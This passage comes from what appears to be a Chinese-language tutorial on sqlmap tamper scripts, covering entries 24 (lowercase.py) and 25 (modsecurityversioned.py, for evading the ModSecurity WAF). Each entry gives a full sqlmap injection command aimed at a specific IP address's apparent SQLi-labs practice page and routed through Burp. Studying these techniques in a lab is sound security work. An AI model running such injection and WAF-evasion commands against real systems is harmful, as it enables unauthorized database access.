24. lowercase.py脚本
将攻击的payload从大写转换为小写,适用于所有的数据库
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="lowercase.py" --proxy="http://127.0.0.1:8080" -batch
发现是可以注入的,burp抓包情况如下:
都变成小写了
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
25. modsecurityversioned.py脚本
使用注释的方式围住完整的查询条件,主要是用于绕过ModSecuriy这个开源的WAF, 适用于Mysql数据库
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="modsecurityversioned.py" --proxy="http://127.0.0.1:8080" -batch
burp抓包没看到效果,用的比较少